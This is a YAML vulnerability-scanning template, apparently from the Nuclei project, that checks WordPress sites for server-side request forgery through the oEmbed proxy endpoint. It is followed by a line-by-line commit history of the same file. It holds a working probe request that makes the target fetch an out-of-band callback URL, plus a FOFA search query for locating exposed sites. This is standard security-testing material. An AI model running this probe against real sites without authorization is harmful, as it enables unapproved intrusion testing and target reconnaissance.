http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml

id: wordpress-ssrf-oembed

info:
  name: Wordpress Oembed Proxy - Server-side request forgery
  author: dhiyaneshDk
  severity: medium
  description: The oEmbed feature in WordPress allows embedding content from external sources, and if it's not properly secured, it could be exploited for SSRF.
  reference:
    - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress
    - https://github.com/incogbyte/quickpress/blob/master/core/req.go
  metadata:
    max-request: 2
    fofa-query: body="oembed" && body="wp-"
  tags: wordpress,ssrf,oast,oembed

http:
  - raw:
      - |
        GET /wp-json/oembed/1.0/proxy HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'rest_missing_callback_param'

      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100d01d8cb29dc06ed371272fb5eb94b0e4d93d1d9392e7d76a9aa9691b160c9f8302206e208f25527d7b4a7bb0578fff2e7d0ff119185620872124d38e02fe3d21c96a:922c64590222798bb761d5b6d8e72950
Create wordpress-ssrf-oembed.yaml 2021-12-16 13:48:34 +05:30			`id: wordpress-ssrf-oembed`

			`info:`
Update wordpress-ssrf-oembed.yaml 2023-09-04 23:43:10 +05:30			`name: Wordpress Oembed Proxy - Server-side request forgery`
Create wordpress-ssrf-oembed.yaml 2021-12-16 13:48:34 +05:30			`author: dhiyaneshDk`
update: lint fix 2021-12-16 14:25:00 +05:30			`severity: medium`
Updated descriptions of templates 2024-01-02 21:15:12 +05:30			`description: The oEmbed feature in WordPress allows embedding content from external sources, and if it's not properly secured, it could be exploited for SSRF.`
Create wordpress-ssrf-oembed.yaml 2021-12-16 13:48:34 +05:30			`reference:`
			`- https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress`
			`- https://github.com/incogbyte/quickpress/blob/master/core/req.go`
Added max request counter of each template 2023-04-28 13:41:21 +05:30			`metadata:`
TemplateMan Update [Mon Sep 4 18:22:21 UTC 2023] :robot: 2023-09-04 18:22:21 +00:00			`max-request: 2`
templateman update 2023-10-14 16:57:55 +05:30			`fofa-query: body="oembed" && body="wp-"`
Update wordpress-ssrf-oembed.yaml 2023-09-04 23:43:10 +05:30			`tags: wordpress,ssrf,oast,oembed`
Create wordpress-ssrf-oembed.yaml 2021-12-16 13:48:34 +05:30
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 09:58:59 +05:30			`http:`
Update wordpress-ssrf-oembed.yaml 2023-09-04 23:43:10 +05:30			`- raw:`
			`- \|`
			`GET /wp-json/oembed/1.0/proxy HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1`
			`Host: {{Hostname}}`
update: lint fix 2021-12-16 14:25:00 +05:30
fix fp wordpress-ssrf-oembed.yaml 2023-09-03 07:13:32 +08:00			`matchers-condition: and`
Create wordpress-ssrf-oembed.yaml 2021-12-16 13:48:34 +05:30			`matchers:`
Update wordpress-ssrf-oembed.yaml 2023-09-04 23:43:10 +05:30			`- type: word`
			`part: body_1`
			`words:`
			`- 'rest_missing_callback_param'`
fix fp wordpress-ssrf-oembed.yaml 2023-09-03 07:13:32 +08:00
Update wordpress-ssrf-oembed.yaml 2023-09-04 23:43:10 +05:30			`- type: word`
			`part: interactsh_protocol # Confirms the HTTP Interaction`
			`words:`
			`- "http"`
Auto Template Signing [Mon Jan 15 11:49:24 UTC 2024] :robot: 2024-01-15 11:49:24 +00:00			`# digest: 4a0a00473045022100d01d8cb29dc06ed371272fb5eb94b0e4d93d1d9392e7d76a9aa9691b160c9f8302206e208f25527d7b4a7bb0578fff2e7d0ff119185620872124d38e02fe3d21c96a:922c64590222798bb761d5b6d8e72950`